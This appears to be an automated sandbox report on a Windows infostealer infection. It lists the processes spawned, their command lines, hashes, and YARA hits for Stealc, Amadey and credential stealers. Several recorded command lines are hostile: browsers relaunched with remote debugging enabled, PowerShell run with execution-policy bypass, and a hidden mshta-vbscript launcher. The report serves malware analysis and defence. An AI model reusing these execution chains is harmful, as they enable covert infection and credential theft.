2024-11-11 23:06:34 UTC	1043	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731366393624&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 9685 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=11FAD531813A66492642C0058058675E; _EDGE_S=F=1&SID=1996236E7A7869AF3367365A7B1A68BD; _EDGE_V=1; _C_ETH=1; msnup=
2024-11-11 23:06:34 UTC	9685	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 31 31 54 32 33 3a 30 36 3a 33 33 2e 36 32 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 33 65 64 62 63 38 35 2d 37 37 31 63 2d 34 36 30 34 2d 39 62 30 37 2d 66 61 64 63 37 64 39 61 61 31 61 63 22 2c 22 65 70 6f 63 68 22 3a 22 32 32 35 30 35 36 34 39 30 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-11-11T23:06:33.623Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"53edbc85-771c-4604-9b07-fadc7d9aa1ac","epoch":"2250564903"},"app":{"loc
2024-11-11 23:06:35 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=8bb22de68b384440b8f0f35ed405d7c8&HASH=8bb2&LV=202411&V=4&LU=1731366395037; Domain=.microsoft.com; Expires=Tue, 11 Nov 2025 23:06:35 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=dec10954aac348e9b9365d96a93bc830; Domain=.microsoft.com; Expires=Mon, 11 Nov 2024 23:36:35 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1413 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Mon, 11 Nov 2024 23:06:34 GMT Connection: close

Target ID:	0
Start time:	18:05:59
Start date:	11/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x390000
File size:	1'815'040 bytes
MD5 hash:	A12C379025757CC07DB3A875813F8B1E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2029641170.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2408418198.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2412929391.00000000010AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:06:06
Start date:	11/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:06:06
Start date:	11/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2168,i,14858037877617579678,5688177104923091675,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:06:15
Start date:	11/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:06:16
Start date:	11/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2224,i,5174629620199250997,17853157087695469379,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:06:16
Start date:	11/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	18:06:17
Start date:	11/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	18:06:22
Start date:	11/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7124 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	18:06:22
Start date:	11/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7304 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	18:06:34
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsECAFHIIJJE.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	18:06:34
Start date:	11/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	18:06:34
Start date:	11/11/2024
Path:	C:\Users\user\DocumentsECAFHIIJJE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\DocumentsECAFHIIJJE.exe"
Imagebase:	0x720000
File size:	3'271'168 bytes
MD5 hash:	B4DF44B9A693D554AD3FCC4F32D5E470
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000014.00000002.2465485176.0000000000721000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	18:06:40
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xfe0000
File size:	3'271'168 bytes
MD5 hash:	B4DF44B9A693D554AD3FCC4F32D5E470
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.2487176719.0000000000FE1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	18:07:00
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xfe0000
File size:	3'271'168 bytes
MD5 hash:	B4DF44B9A693D554AD3FCC4F32D5E470
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000002.3287942560.0000000000FE1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	18:07:07
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005627001\file1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005627001\file1.exe"
Imagebase:	0x7f0000
File size:	1'888'768 bytes
MD5 hash:	FC29E2A6DEBBB8C620CD719369DE7F9F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.2797964606.0000000001348000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.2784537176.0000000001348000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000003.2786414749.0000000001348000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	18:07:11
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1"
Imagebase:	0xe0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	18:07:11
Start date:	11/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	18:07:14
Start date:	11/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	18:07:17
Start date:	11/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7420 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	18:07:20
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Imagebase:	0xc10000
File size:	3'161'088 bytes
MD5 hash:	238681147F0B917647D5950BA69B9AAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2879905773.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2892968437.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2903502679.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2877445648.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2889137104.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2929560709.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2904349240.00000000055EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001E.00000002.3126061500.0000000005C71000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2918822463.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001E.00000003.3056144256.0000000008170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 39%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	18:07:24
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe"
Imagebase:	0x50000
File size:	1'815'040 bytes
MD5 hash:	A12C379025757CC07DB3A875813F8B1E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001F.00000003.2885364496.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001F.00000002.2927027729.0000000000051000.00000040.00000001.01000000.00000013.sdmp, Author: Joe Security
Antivirus matches:	Detection: 37%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	18:07:27
Start date:	11/11/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 """""" ,0:close")
Imagebase:	0x7ff7df910000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	18:07:28
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:
File size:	3'271'168 bytes
MD5 hash:	B4DF44B9A693D554AD3FCC4F32D5E470
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	18:07:28
Start date:	11/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 "
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	18:07:28
Start date:	11/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	18:07:32
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe"
Imagebase:	0xa10000
File size:	2'786'816 bytes
MD5 hash:	F6AF95F6A9FA7B7AD15A1A6944A12A18
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 37%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	18:07:33
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Imagebase:	0xc10000
File size:	3'161'088 bytes
MD5 hash:	238681147F0B917647D5950BA69B9AAE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3074099471.0000000001564000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3091077119.0000000001564000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3093531602.0000000001564000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3096193571.0000000001564000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3097797490.000000000156E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3098474106.0000000001573000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3091523965.0000000001564000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3072686182.0000000001564000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3095820288.0000000001564000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3094627589.0000000001564000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000025.00000003.3199061417.00000000087A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3094047183.0000000001564000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3096841796.0000000001564000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3095179623.0000000001564000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000025.00000002.3270846693.0000000006341000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000025.00000003.3079259497.0000000001564000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	18:07:41
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe"
Imagebase:	0x50000
File size:	1'815'040 bytes
MD5 hash:	A12C379025757CC07DB3A875813F8B1E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000026.00000003.3059189818.0000000005120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000026.00000002.3205541238.000000000136B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000026.00000002.3196919508.0000000000051000.00000040.00000001.01000000.00000013.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	18:07:50
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe"
Imagebase:	0xa10000
File size:	2'786'816 bytes
MD5 hash:	F6AF95F6A9FA7B7AD15A1A6944A12A18
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	18:08:00
Start date:	11/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Imagebase:	0xc10000
File size:	3'161'088 bytes
MD5 hash:	238681147F0B917647D5950BA69B9AAE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	29.2%
Total number of Nodes:	113
Total number of Limit Nodes:	13

Executed Functions

Function 6C6235A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C6AF688,00001000), ref: 6C6235D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6235E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C6235FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C62363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C62369F
__aulldiv.LIBCMT ref: 6C6236E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C623773
EnterCriticalSection.KERNEL32(6C6AF688), ref: 6C62377E
LeaveCriticalSection.KERNEL32(6C6AF688), ref: 6C6237BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C6237C4
EnterCriticalSection.KERNEL32(6C6AF688), ref: 6C6237CB
LeaveCriticalSection.KERNEL32(6C6AF688), ref: 6C623801
__aulldiv.LIBCMT ref: 6C623883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C623902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C623918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C62394C

Strings

QPC, xrefs: 6C6238FC
MOZ_TIMESTAMP_MODE, xrefs: 6C6235DB
AuthcAMDenti, xrefs: 6C623946
GenuntelineI, xrefs: 6C623639
GTC, xrefs: 6C623912

Memory Dump Source

Source File: 00000000.00000002.2445232982.000000006C621000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2445197773.000000006C620000.00000002.00000001.01000000.0000000A.sdmpDownload File
